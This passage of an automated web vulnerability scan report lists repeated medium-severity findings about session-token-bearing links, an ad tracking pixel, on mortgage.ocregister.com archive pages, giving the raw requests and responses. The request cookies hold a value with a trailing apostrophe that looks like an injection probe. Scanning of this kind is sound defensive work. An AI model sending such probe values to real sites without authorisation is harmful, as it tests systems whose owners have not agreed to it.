11.30. http://mortgage.ocregister.com/2007/11/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.31. http://mortgage.ocregister.com/2007/12/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2007/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.32. http://mortgage.ocregister.com/2008/01/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.33. http://mortgage.ocregister.com/2008/02/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.34. http://mortgage.ocregister.com/2008/03/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.35. http://mortgage.ocregister.com/2008/04/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.36. http://mortgage.ocregister.com/2008/05/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.37. http://mortgage.ocregister.com/2008/06/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.38. http://mortgage.ocregister.com/2008/07/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/07/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.39. http://mortgage.ocregister.com/2008/08/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.40. http://mortgage.ocregister.com/2008/09/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 111978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.41. http://mortgage.ocregister.com/2008/10/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/10/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 110844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.42. http://mortgage.ocregister.com/2008/11/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/11/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.43. http://mortgage.ocregister.com/2008/12/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2008/12/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2008/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.44. http://mortgage.ocregister.com/2009/01/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/01/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.45. http://mortgage.ocregister.com/2009/02/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/02/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.46. http://mortgage.ocregister.com/2009/03/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/03/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.47. http://mortgage.ocregister.com/2009/04/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/04/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.48. http://mortgage.ocregister.com/2009/05/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/05/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</div>


<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1518&token=FOCI1" width="1" height="1" border="0">

<script language="JavaScript">
...[SNIP]...

11.49. http://mortgage.ocregister.com/2009/06/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mortgage.ocregister.com
Path:   /2009/06/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /2009/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
